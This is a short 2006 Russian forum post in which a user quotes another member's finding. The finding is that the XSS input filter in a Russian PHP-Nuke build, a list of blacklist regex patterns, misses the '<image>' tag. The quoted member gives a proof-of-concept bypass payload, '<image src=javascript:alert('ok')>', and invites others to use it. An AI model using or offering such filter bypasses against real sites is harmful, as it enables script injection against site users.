Показать сообщение отдельно

  #2  
Старый 24.02.2006, 00:32
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
С нами: 11133086

Репутация: 241
По умолчанию

Цитата:
Сообщение от Dr0ne  
я просмотрел код нюки на русском на нашел брешь в проверке на XSS
PHP код:
if (!defined('ADMIN_FILE')) {     foreach ($_GET as $sec_key => $secvalue) {         if ((eregi("<*script*\"?*>"$secvalue)) ||         (eregi("<*object*\"?*>"$secvalue)) ||         (eregi("<*iframe*\"?*>"$secvalue)) ||         (eregi("<*applet*\"?*>"$secvalue)) ||         (eregi("<*meta*\"?*>"$secvalue)) ||         (eregi("<*style*\"?*>"$secvalue)) ||         (eregi("<*form*\"?*>"$secvalue)) ||         (eregi("<*img*\"?*>"$secvalue)) ||         (eregi("<*onmouseover*\"?*>"$secvalue)) ||         (eregi("\(*\"?*\)"$secvalue)) ||         (eregi("\""$secvalue)) ||         (eregi("forum_admin"$sec_key)) ||         (eregi("inside_mod"$sec_key))) { 
тут нет проверки на тэг <image >
атаку можно провести так
Код HTML:
<image src=javascript:alert('ok')>
пользуйтесь. будут вопросы - обращайтесь
RE конечно, но хотелось бы немного поподробнее....
 
Ответить с цитированием